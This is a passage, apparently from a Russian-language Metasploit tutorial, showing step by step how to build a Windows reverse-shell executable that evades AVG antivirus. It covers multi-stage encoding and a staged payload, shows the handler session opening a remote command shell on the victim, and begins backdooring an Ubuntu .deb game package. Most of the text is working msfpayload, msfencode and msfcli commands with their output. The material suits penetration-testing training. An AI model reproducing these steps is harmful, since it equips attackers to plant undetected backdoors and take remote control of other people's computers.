root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe                                                                          
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
 
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
 
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
 
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
 
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
 
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10)
 
[*] x86/call4_dword_xor succeeded with size 586 (iteration=1)
 
[*] x86/call4_dword_xor succeeded with size 614 (iteration=2)
 
[*] x86/call4_dword_xor succeeded with size 642 (iteration=3)
 
[*] x86/call4_dword_xor succeeded with size 670 (iteration=4)
 
[*] x86/call4_dword_xor succeeded with size 698 (iteration=5)
 
[*] x86/call4_dword_xor succeeded with size 726 (iteration=6)
 
[*] x86/call4_dword_xor succeeded with size 754 (iteration=7)
 
[*] x86/call4_dword_xor succeeded with size 782 (iteration=8)
 
[*] x86/call4_dword_xor succeeded with size 810 (iteration=9)
 
[*] x86/call4_dword_xor succeeded with size 838 (iteration=10)
 
[*] x86/countdown succeeded with size 856 (iteration=1)
 
root@bt4:/pentest/exploits/framework3# file /tmp/6.exe
/tmp/6.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Хорошо, мы копируем бинарный файл, запускаем его, ииииии.....

avg3

Нам опять не удалось! AVG по прежнему обнаруживает в нашем бинарнике вредоносный код. Сможем ли мы вообще это обойти? Что же, оказывается, у нас есть некоторые уловки. Metasploit поддерживает два различных типа полезной нагрузки. Первый вид 'windows/shell_reverse_tcp', содержит весь код необходимый для полезной нагрузки. Другой 'windows/shell/reverse_tcp' работает немного по другому. 'windows/shell/reverse_tcp' содержит код для открытия сетевого подключения, остальной код эксплоита находится на машине нападающего. Таким образом в случае 'windows/shell/reverse_tcp', подключение выполняется к атакующему хосту, остальная часть полезной нагрузки будет загружена в память, а затем предоставляется shell.
Итак как ведет себя при этом антивирус? Ну большинство антивирусов работает на основе сигнатурной технологии. Код сигнатуры 'windows/shell_reverse_tcp' содержится в базах вредоносного ПО. 'windows/shell/reverse_tcp' соответственно не содержит тех сигнатур, что ищет AVG.
Имея это в виду, давайте генерировать 'Windows / Shell / reverse_tcp' бинарную полезную нагрузку.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/7.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 278
Options: LHOST=172.16.104.130,LPORT=31337
 
root@bt4:/pentest/exploits/framework3# file /tmp/7.exe
/tmp/7.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Ладно теперь мы скопируем файл на удаленную систему и запустим, посмотрим что произойдет.

root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (172.16.104.130:31337 -> 172.16.104.128:1548)
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\Documents and Settings\Jim\My Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726
 
Directory of C:\Documents and Settings\Jim\My Documents
 
05/27/2009 09:56 PM 
.
05/27/2009 09:56 PM 
..
05/25/2009 09:36 PM 9,728 7.exe
05/25/2009 11:46 PM 
Downloads
10/29/2008 05:55 PM 
My Music
10/29/2008 05:55 PM 
My Pictures
1 File(s) 9,728 bytes
5 Dir(s) 38,655,614,976 bytes free
 
C:\Documents and Settings\Jim\My Documents>

Успех! Наша нагрузка успешно уклонилась от антивирусной защиты.

Трояны под Linux.

Для того, чтобы продемонстрировать, что атаки на «стороне клиента» существуют не только под Windows, мы будем использовать Metasploit для создания Ubuntu deb пакета, чтобы заполучить shell на Linux.
Отличное видео выступиления Redmeat_uk демонстрации этой техники, вы можете увидеть на http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx
Сначала необходимо загрузить пакет, который мы собираемся «заразить» и перенести его во временный рабочий каталог. В нашем примере мы будем использовать пакет freesweep, текстовая версия Mine Sweeper.

root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
root@bt4:/tmp/evil#

Далее, нам необходимо извлечь пакет в рабочую директорию и создать директорию DEBIAN для добавления наших дополнительных «возможностей».

root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work